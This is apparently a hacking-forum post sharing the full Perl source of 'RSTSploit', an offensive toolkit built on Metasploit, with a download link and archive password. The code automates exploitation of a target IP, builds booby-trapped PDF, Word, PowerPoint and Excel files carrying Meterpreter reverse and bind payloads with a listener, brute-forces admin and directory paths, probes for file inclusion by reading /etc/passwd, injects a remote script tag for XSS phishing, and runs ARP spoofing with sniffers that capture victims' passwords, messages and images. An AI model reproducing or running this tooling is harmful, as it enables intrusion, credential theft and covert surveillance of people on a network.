Search the Community

This tool uses 0day metasploit vulnerabilities ( plugins / modules ) made specially for RSTCENTER.COM coded in perl. Recomand: Use it on Backtrack 5, or RC1 *or higher* for best results. http://code.google.com/p/rstsploit/downloads/list ( contains the rest of the files ) Pass for rar: rstcenter.com #!/usr/bin/perl # -------------------------------------------------- # RSTSploit ToolKit # -------------------------------------------------- # Copyright (C) <2012> <DarkStone> # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # # # RSTSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability # RSTsploit Toolkit Version 1.0 # # Description : # # [+]Autopwn - Used From Metasploit For Scan and Exploit Target Service # [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin # [+]format infector - inject reverse & bind payload into file format # [+]phpmyadmin - Search Target phpmyadmin login page # [+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF # [+]apache users - search server username directory (if use from apache webserver) # [+]Dir Bruter - brute target directory with wordlist # [+]admin finder - search admin & login page of target # [+]MLITM,XSS Phishing - Man Left In The Middle Attack # [+]MITM - Man In The Middle Attack # # About Author : # # Founder : DarkStone # Email : darkston3e@yahoo.com # Thanks To : Hippi & Cr0w for helping # use Term::ANSIColor qw(:constants); use HTTP::Request; use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); $header = int rand (6); open (HDR, "hdr//$header.wsf"); @RHDR=<HDR>; $email = 'darkston3e@yahoo.com'; print GREEN, "@RHDR", RESET; print "\n\n"; print CYAN ")=-=-=-=[ RSTSploit Toolkit Version 1.0\n", RESET; print CYAN ")=-=-=-=[ Report Bug : $email\n", RESET; print "\n\n"; print "\tID & Name\t\t Description\n"; print "\t------------\t\t--------------\n"; print "\t[1]AutoPWN\t\t Scan,Detect Target Service's And Exploit Automated\n"; print "\t[2]Wmap\t\t\t Crawler,Scan Target Web Service\n"; print "\t[3]Format Infector\t Inject Custom Payload Into File Formats\n"; print "\t[4]PHPMyAdmin\t\t Scan PHPMyAdmin Page\n"; print "\t[5]LFI\t\t\t Scan Local File Inclusion Vulnerability\n"; print "\t[6]Apache User\t\t Scan Apache User's Directory\n"; print "\t[7]Dir Bruter\t\t Brute Force Directory Of Target Site\n"; print "\t[8]Admin Finder\t\t Scan Target Admin Page\n"; print "\t[9]MLITM Attack\t\t Man Left In The Middle, XSS Phishing Attack\n"; print "\t[10]MITM Attack\t\t Man In The Middle Attack\n"; print "\n"; print CYAN, UNDERLINE "wsf", RESET; print " > "; $selector = <STDIN>; chomp ($selector); if ($selector ==1){&autopwn} if ($selector ==2){&wmap} if ($selector ==3){&infector} if ($selector ==4){&phpmyadmin} if ($selector ==5){&lfi} if ($selector ==6){&apache} if ($selector ==7){&DBR} if ($selector ==8){&admin} if ($selector ==9){&MLITM} if ($selector ==10){&MITM} sub autopwn { print "\n"; print YELLOW, BOLD "[*]Scan Target Service's With NMAP\n", RESET; print YELLOW, BOLD "[*]Detect Target Service's Via Open Ports\n", RESET; print YELLOW, BOLD "[*]Launch All Exploit ...\n", RESET; print RED, BOLD, UNDERLINE "[*]Use From Bind Payload,So Not Need To The Valid IP Address\n\n", RESET; print CYAN, UNDERLINE "wsf:Autopwn", RESET; print " > Enter Target IP Address : "; $target_ip = <STDIN>; chomp ($target_ip); print BLUE, BOLD "[*]Your Target => $target_ip\n"; print "[*]Engine Started ...\n", RESET; if (-e "tmp//rstsploit_autopwn.rc"){system ("rm -rf tmp//rstsploit_autopwn.rc")} open (APF, ">>tmp//rstsploit_autopwn.rc"); print APF "workspace -d rstsploit\n"; print APF "workspace -a rstsploit\n"; print APF "db_nmap $target_ip\n"; print APF "db_autopwn -t -x -p -e\n"; close (APF); system ("msfconsole -r tmp//rstsploit_autopwn.rc"); exit; } sub wmap { print "\n"; print YELLOW, BOLD "[*]Scan WebServer & Version Of Target\n"; print "[*]Crawler Target WebSite\n"; print "[*]Scan Webdav & etc About Target Server & Site\n\n", RESET; print CYAN, UNDERLINE "wsf:Wmap", RESET; print " > Enter Your Target IP Address : "; $target_ip = <STDIN>; chomp ($target_ip); print BLUE, BOLD "[*]Your Target IP => $target_ip\n"; print "[*]Engine Started ...\n", RESET; sleep (2); if (-e "tmp//rstsploit_wmap.rc"){system ("rm -rf tmp//rstsploit_wmap.rc")} open (WMS, ">>tmp//rstsploit_wmap.rc"); print WMS "workspace -d rstsploit-wmap\n"; print WMS "workspace -a rstsploit-wmap\n"; print WMS "load wmap\n"; print WMS "sleep 3\n"; print WMS "wmap_targets -c\n"; print WMS "wmap_sites -a $target_ip\n"; print WMS "wmap_targets -t $target_ip\n"; print WMS "wmap_run -t\n"; print WMS "sleep 3\n"; print WMS "wmap_run -e\n"; close (WMS); system ("msfconsole -r tmp//rstsploit_wmap.rc"); exit; } sub infector { print "\n"; print "\tID & Format\t\t Description\n"; print "\t------------\t\t--------------\n"; print "\t[1]PDF\t\t\t Adobe Flash Player [newfunction] Invalid Pointer Use\n"; print "\t[2]RTF\t\t\t Microsoft Word RTF [pFragments] Stack Buffer Overflow\n"; print "\t[3]PPT\t\t\t Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow\n"; print "\t[4]XLS\t\t\t Microsoft Excel Malformed FEATHEADER Record Vulnerability\n"; print "\t[5]VBP\t\t\t Microsoft Visual Basic VBP Buffer Overflow\n"; print "\t[6]EPS\t\t\t Adobe Illustrator CS4 v14.0.0\n"; print "\n"; print CYAN, UNDERLINE "wsf:Infector", RESET; print " > Enter The ID Of Format : "; $selector_2 = <STDIN>; chomp ($selector_2); if ($selector_2 ==1){$expl_name = "exploit/windows/fileformat/adobe_flashplayer_newfunction"} if ($selector_2 ==2){$expl_name = "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof"} if ($selector_2 ==3){$expl_name = "exploit/windows/fileformat/ms10_004_textbytesatom"} if ($selector_2 ==4){$expl_name = "exploit/windows/fileformat/ms09_067_excel_featheader"} if ($selector_2 ==5){$expl_name = "exploit/windows/fileformat/ms_visual_basic_vbp"} if ($selector_2 ==6){$expl_name = "exploit/windows/fileformat/adobe_illustrator_v14_eps"} print "\n"; print CYAN, UNDERLINE "wsf:Infector", RESET; print " > Enter Your IP Address (Use In Reverse Payload) : "; $ourip = <STDIN>; chomp ($ourip); print "\n"; print "\tID & Payload\t\t Description\n"; print "\t------------\t\t--------------\n"; print "\t[1]Bind TCP\t\t Windows Meterpreter (Reflective Injection), Bind TCP Stager\n"; print "\t[2]Reverse TCP\t\t Windows Meterpreter (Reflective Injection), Reverse TCP Stager\n"; print "\t[3]DLL,Reverse\t\t Reflective Dll Injection, Reverse TCP Stager\n"; print "\t[4]DLL,Bind\t\t Reflective Dll Injection, Bind TCP Stager\n"; print "\n"; print CYAN, UNDERLINE "wsf:Infector", RESET; print " > Select Payload : "; $selector_3 = <STDIN>; chomp ($selector_3); if ($selector_3 ==1){$payload_name = "PAYLOAD=windows/meterpreter/bind_tcp"} if ($selector_3 ==2){$payload_name = "PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourip"} if ($selector_3 ==3){$payload_name = "PAYLOAD=windows/dllinject/reverse_tcp LHOST=$ourip"} if ($selector_3 ==4){$payload_name = "PAYLOAD=windows/dllinject/bind_tcp"} print "\n"; print "[!]-------[Information]-------[!]\n"; print "[!] Exploit : $expl_name\n"; print "[!] Payload : $payload_name\n"; print "[!] Location: /root/.msf4/data/exploits\n"; print "[!]---------------------------[!]\n"; print "\n"; sleep (1); system ("msfcli $expl_name $payload_name E"); print "\n"; print GREEN, BOLD "[*] Do You Want To Create Listener ? <y/n> : ", RESET; $les=<STDIN>; chomp ($les); if ($les =~ /y/){ system ("msfcli exploit/multi/handler $payload_name E"); } else { print YELLOW, BOLD "[*]Thank You For Using rstsploit,Have Nice Time\n"; print "[*]Bye Bye\n", RESET; } } sub phpmyadmin { $res_code = "200"; print "\n"; print YELLOW, BOLD "[*]PHPMyAdmin Login Page Finder\n"; print "[*]Enter Target Address (ex : http://site.com)\n\n", RESET; print CYAN, UNDERLINE "wsf:PHPMyAdmin", RESET; print " > Enter Target Address : "; $target_add = <STDIN>; chomp ($target_add); print GREEN, BOLD "[*]Loading List ...\n", RESET; sleep (2); print GREEN, BOLD "[*]Scanning ...\n", RESET; open (PHPMYADMIN, "<scr//phpmyadmin.csv") or die "[-]Error,Can't Found 'phpmyadmin.csv' File!\n"; while (<PHPMYADMIN>){ $path = $_; chomp ($path); $url=$target_add.$path; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($res_code)){ print GREEN "[+] [FOUND] ..... $path\n", RESET; } else {print RED "[-] [ERROR] ..... $path\n", RESET;} } close(PHPMYADMIN); print "\n"; print "DONE.\n"; } sub lfi { print "\n"; print YELLOW, BOLD "[*]Scan Local File Inclusion Vulnerability On Your Target\n"; print "[*]Can Be Bypass Some Web Application Firewall (WAF)\n"; print "[*]Enter Target (ex : http://site.com/index.php?page=)\n", RESET; print CYAN, UNDERLINE "wsf:LFI", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print "\n"; print YELLOW, BOLD "[*]Engine Started ...\n", RESET; sleep (2); print YELLOW, BOLD "[+]Scanning ...\n", RESET; print "\n"; open (LFI, "<scr//lfi.csv") or die "[-]Error,Can't Found 'lfi.csv' File!\n"; while (<LFI>){ $try = $_; chomp ($try); $url=$target_add.$try; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success && $response->content =~ /root:x:/){ print GREEN, BOLD "[+] [FOUND] $try\n", RESET; } else { print ""; } } close (LFI); print "\n"; print YELLOW, BOLD "[*]DONE.\n", RESET; } sub apache { $res_code = "200"; print "\n"; print YELLOW, BOLD "[!]Brute Apache Directory Of Users\n"; print "[!]Enter Target (ex : http://site.com)\n", RESET; print CYAN, UNDERLINE "wsf:Apache", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print YELLOW, BOLD "[*]Loading Users List ...\n", RESET; sleep (2); print YELLOW, BOLD "[*]Engine Started ...\n"; print "[*]Scanning ...\n", RESET; open (APACHE, "<scr//apache.csv") or die "[-]Error, Can't Found 'apache.csv' File!\n"; while (<APACHE>){ $user = $_; chomp ($user); $url=$target_add.$user; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($res_code)){ print GREEN, BOLD "[+][FOUND] ... $url\n", RESET; } else {print "";} } close (APACHE); print "\n"; print YELLOW, BOLD "[*]DONE.\n", RESET; } sub DBR { $code="2xx"; print "\n"; print YELLOW, BOLD "[*]Brute Target Directory With WordList\n"; print "[*]Enter Target Address (ex : http://site.com/)\n\n", RESET; print CYAN, UNDERLINE "wsf:DirBruter", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print BLUE, BOLD "\n[*]Loading WordList ...\n"; sleep (2); print "[*]Engine Started ...\n"; print "[*]Scanning ...\n", RESET; print "\n"; open (WORDLIST, "<scr//DBR.csv") or die "[-]Error,Can't Found 'DBR.csv' File!\n"; while (<WORDLIST>){ $wl=$_; chomp ($wl); $slash="/"; $url = $target_add.$slash.$wl; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($code)){ print GREEN "[+] [FOUND] ... $url\n", RESET; } else {print RED "[-] [ERROR] ... $url\n", RESET;} } close (WORDLIST); print "\n"; print YELLOW, BOLD "[*]DONE.\n"; } sub admin { $res_code="200"; print YELLOW, BOLD "[*]Scan Admin/Login Page Of Your Target\n"; print "[*]Enter Target Address (ex : http://site.com)\n", RESET; print CYAN, UNDERLINE "wsf:AdminFinder", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print BLUE, BOLD "[*]Loading Admin Page Name List ...\n"; sleep (2); print "[!]Engine Started ...\n"; print "[!]Scanning ...\n", RESET; print "\n"; open (ADMINS, "<scr//admins.csv") or die "[-]Error,Can't Found 'admins.csv' File!\n"; while (<ADMINS>){ $adminpath=$_; chomp ($adminpath); $url = $target_add.$adminpath; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($res_code)){ print GREEN "[+] [FOUND] ... $url\n", RESET; } else {print RED "[-] [ERROR] ... $url\n", RESET;} } close (ADMINS); print "\n"; print YELLOW, BOLD "[*]DONE.\n", RESET; } sub MLITM { print "\n"; print RED BOLD "[*]Written by DarkStone\n"; print '[*]darkston3e@yahoo.com'; print "\n"; print YELLOW BOLD "[*]This is not an exploit tool, it's a payload tool.\n"; print "[*]Once you've found the exloit, and you're able to inject javascript,\n"; print "[*]just stick this in there as a script.\n"; print '[*]<script src="http://YOURIP/">', RESET; print "\n"; print BLUE BOLD "[*]Stoping Web Server ... ", RESET; system ("xterm -e service apache2 stop"); sleep (2); print BLUE BOLD "OK\n", RESET; print "\n"; print CYAN UNDERLINE "wsf:MLITM", RESET; print " > Press [ENTER] For Start XSS Phishing Attack : "; $enter = <STDIN>; system ("python scr//thebiz.py"); } sub MITM { print "\n"; print YELLOW BOLD "[*]Man In The Middle Attack\n", RESET; print YELLOW BOLD "[*]Sniff Victim Information In Your Network\n", RESET; print YELLOW BOLD "[*]Enter Interface Name (ex : eth0 ,eth1 ,wlan0)\n", RESET; print CYAN UNDERLINE "wsf:MITM", RESET; print " > Enter Interface Name : "; $interface_name = <STDIN>; chomp ($interface_name); print CYAN UNDERLINE "wsf:MITM", RESET; print " > Enter Router IP Address : "; $router_ip = <STDIN>; chomp ($router_ip); print CYAN UNDERLINE "wsf:MITM", RESET; print " > Enter Target IP Address : "; $target_ip = <STDIN>; chomp ($target_ip); print "\n"; print "\tSniffers\t\t Description\n"; print "\t------------\t\t--------------\n"; print "\t[1]DSniffer\t\t Sniff All Passwords\n"; print "\t[2]Msgsnarf\t\t Sniff All Text Of Victim Messengers\n"; print "\t[3]Urlsnarf\t\t Sniff Victim Links\n"; print "\t[4]Driftnet\t\t Sniff Victim Images\n"; print "\n"; print CYAN UNDERLINE "msf:MITM", RESET; print " > Enter Selected Sniffer ID : "; $sniff_selector = <STDIN>; chomp ($sniff_selector); if ($sniff_selector ==1){$selected_sniffer="dsniff -i $interface_name"} if ($sniff_selector ==2){$selected_sniffer="msgsnarf -i $interface_name"} if ($sniff_selector ==3){$selected_sniffer="urlsnarf -i $interface_name"} if ($sniff_selector ==4){$selected_sniffer="driftnet -i $interface_name"} # ip forwarding section print "\n"; print BLUE BOLD "[*]IP Forwarding ... ", RESET; $p_forwarding = 'xterm -T "RSTSploit - Port Forwarding ..." -e "echo 1 > /proc/sys/net/ipv4/ip_forward"'; system ("$p_forwarding"); sleep (2); print BLUE BOLD "OK\n", RESET; print BLUE BOLD "[*]ARP Spoofing ... ", RESET; $arp_spoofing1 = "xterm -e arpspoof -i $interface_name -t $target_ip $router_ip &"; $arp_spoofing2 = "xterm -e arpspoof -i $interface_name -t $router_ip $target_ip &"; print BLUE BOLD "OK\n", RESET; system ("$arp_spoofing1"); sleep (1); system ("$arp_spoofing2"); sleep (1); system ("$selected_sniffer"); } # # RSTsploit Toolkit Version 1.0 # Written By DarkStone # RSTSploit Project : https://www.rstcenter.com